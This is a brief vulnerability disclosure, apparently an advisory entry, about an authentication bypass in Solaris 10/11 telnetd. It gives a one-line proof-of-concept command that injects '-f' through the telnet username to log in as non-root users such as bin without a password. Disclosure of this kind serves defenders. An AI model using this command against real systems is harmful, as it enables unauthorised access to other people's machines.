telnetd on Solaris 10/11 allows for access bypass by passing a username to -l -f.  This doesn't work for root but works for all other uids.

POC:

telnet -l "-fbin" target_address

Discovered by kcope